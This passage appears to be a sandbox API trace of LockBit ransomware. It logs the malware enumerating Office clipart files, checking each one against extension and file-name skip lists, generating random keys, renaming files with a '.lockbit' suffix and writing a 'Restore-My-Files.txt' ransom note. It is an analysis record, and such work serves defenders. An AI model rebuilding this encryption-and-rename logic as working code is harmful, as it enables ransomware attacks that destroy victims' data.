(lpString1=".hlp", lpString2=".WMF") returned -1 [0139.198] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0139.198] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0139.198] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0139.198] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0139.198] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0139.198] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0139.198] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0139.198] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0139.198] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0139.198] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0139.198] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0139.199] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0139.199] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0139.199] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0139.199] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0139.199] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0139.199] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0139.199] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.199] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0139.199] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0139.199] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0139.199] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0139.199] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0106146.WMF") returned 1 [0139.199] lstrcmpiW (lpString1="ntldr", lpString2="J0106146.WMF") returned 1 [0139.199] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0106146.WMF") returned 1 [0139.199] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0106146.WMF") returned -1 [0139.199] lstrcmpiW (lpString1="autorun.inf", lpString2="J0106146.WMF") returned -1 [0139.199] lstrcmpiW (lpString1="thumbs.db", lpString2="J0106146.WMF") returned 1 [0139.199] lstrcmpiW (lpString1="iconcache.db", lpString2="J0106146.WMF") returned -1 [0139.199] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0139.199] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106146.WMF") returned=".WMF" [0139.199] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0139.199] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0139.199] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0139.199] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0139.199] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0139.199] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0139.199] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0139.199] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0139.199] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0139.199] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0139.199] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0139.199] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0139.199] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0139.199] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0139.200] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0139.200] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0139.200] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0139.200] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0139.200] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0139.200] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0139.200] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0139.200] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0139.200] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0139.200] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0139.200] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0139.200] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0139.200] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0139.200] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0139.200] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106146.WMF.lockbit") returned 72 [0139.200] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106146.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106146.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0139.201] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0139.201] malloc (_Size=0x40068) returned 0x3df0008 [0139.201] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=23548) returned 1 [0139.201] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.201] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.201] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0139.201] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.202] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.202] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0139.202] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.206] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106146.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106146.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0139.206] malloc (_Size=0xa6) returned 0x77d7a8 [0139.206] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0139.209] free (_Block=0x77d7a8) [0139.209] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106146.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0139.209] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0139.209] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0139.209] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65e8eef0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2e7c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0106208.WMF", cAlternateFileName="")) returned 1 [0139.209] lstrcmpiW (lpString1=".", lpString2="J0106208.WMF") returned -1 [0139.209] lstrcmpiW (lpString1="..", lpString2="J0106208.WMF") returned -1 [0139.209] PathFindExtensionW (pszPath="J0106208.WMF") returned=".WMF" [0139.209] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0139.209] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0139.209] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0139.209] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0139.209] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0139.209] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0139.209] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0139.209] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0139.209] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0139.209] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0139.209] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0139.209] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0139.209] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0139.209] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0139.209] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0139.209] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0139.209] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0139.209] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0139.209] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0139.210] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0139.210] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0139.210] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0139.210] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0139.210] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0139.210] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.210] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0139.210] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0139.210] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0139.210] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0139.210] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0139.210] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0139.210] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0139.210] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0139.210] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0139.210] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0139.210] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0139.210] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0139.210] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0139.210] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0139.210] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0139.210] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0139.210] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0139.210] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.210] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0139.210] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0139.210] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0139.210] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0139.210] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0106208.WMF") returned 1 [0139.210] lstrcmpiW (lpString1="ntldr", lpString2="J0106208.WMF") returned 1 [0139.210] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0106208.WMF") returned 1 [0139.210] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0106208.WMF") returned -1 [0139.210] lstrcmpiW (lpString1="autorun.inf", lpString2="J0106208.WMF") returned -1 [0139.211] lstrcmpiW (lpString1="thumbs.db", lpString2="J0106208.WMF") returned 1 [0139.211] lstrcmpiW (lpString1="iconcache.db", lpString2="J0106208.WMF") returned -1 [0139.211] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0139.211] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106208.WMF") returned=".WMF" [0139.211] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0139.211] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0139.211] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0139.211] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0139.211] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0139.211] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0139.211] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0139.211] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0139.211] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0139.211] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0139.211] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0139.211] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0139.211] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0139.211] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0139.211] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0139.211] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0139.211] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0139.211] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0139.211] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0139.211] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0139.211] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0139.211] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0139.211] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0139.211] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0139.211] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0139.211] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0139.211] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0139.212] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0139.212] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106208.WMF.lockbit") returned 72 [0139.212] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106208.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106208.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0139.213] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0139.213] malloc (_Size=0x40068) returned 0x3df0008 [0139.213] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=11900) returned 1 [0139.213] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.213] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.213] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0139.213] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.214] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.214] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0139.214] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.218] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106208.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106208.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0139.218] malloc (_Size=0xa6) returned 0x77d7a8 [0139.218] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0139.220] free (_Block=0x77d7a8) [0139.220] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106208.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0139.220] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0139.220] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0139.220] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65e8eef0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x4c90, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0106222.WMF", cAlternateFileName="")) returned 1 [0139.221] lstrcmpiW (lpString1=".", lpString2="J0106222.WMF") returned -1 [0139.221] lstrcmpiW (lpString1="..", lpString2="J0106222.WMF") returned -1 [0139.221] PathFindExtensionW (pszPath="J0106222.WMF") returned=".WMF" [0139.221] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0139.221] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0139.221] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0139.221] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0139.221] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0139.221] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0139.221] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0139.221] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0139.221] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0139.221] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0139.221] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0139.221] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0139.221] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0139.221] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0139.221] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0139.221] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0139.221] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0139.221] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0139.221] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0139.221] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0139.221] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0139.221] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0139.221] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0139.221] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0139.221] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.221] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0139.221] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0139.221] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0139.221] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0139.222] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0139.222] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0139.222] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0139.222] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0139.222] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0139.222] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0139.222] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0139.222] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0139.222] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0139.222] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0139.222] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0139.222] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0139.222] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0139.222] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.222] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0139.222] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0139.222] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0139.222] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0139.222] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0106222.WMF") returned 1 [0139.222] lstrcmpiW (lpString1="ntldr", lpString2="J0106222.WMF") returned 1 [0139.222] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0106222.WMF") returned 1 [0139.222] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0106222.WMF") returned -1 [0139.222] lstrcmpiW (lpString1="autorun.inf", lpString2="J0106222.WMF") returned -1 [0139.222] lstrcmpiW (lpString1="thumbs.db", lpString2="J0106222.WMF") returned 1 [0139.222] lstrcmpiW (lpString1="iconcache.db", lpString2="J0106222.WMF") returned -1 [0139.222] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0139.222] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106222.WMF") returned=".WMF" [0139.222] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0139.222] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0139.222] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0139.222] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0139.222] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0139.222] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0139.222] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0139.222] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0139.222] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0139.223] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0139.223] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0139.223] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0139.223] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0139.223] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0139.223] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0139.223] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0139.223] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0139.223] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0139.223] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0139.223] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0139.223] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0139.223] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0139.223] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0139.223] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0139.223] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0139.223] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0139.223] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0139.223] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0139.223] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106222.WMF.lockbit") returned 72 [0139.223] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106222.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106222.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0139.224] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0139.224] malloc (_Size=0x40068) returned 0x3df0008 [0139.224] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=19600) returned 1 [0139.224] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.224] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.224] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0139.224] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.225] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.225] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0139.225] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.228] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106222.WMF.lockbit", 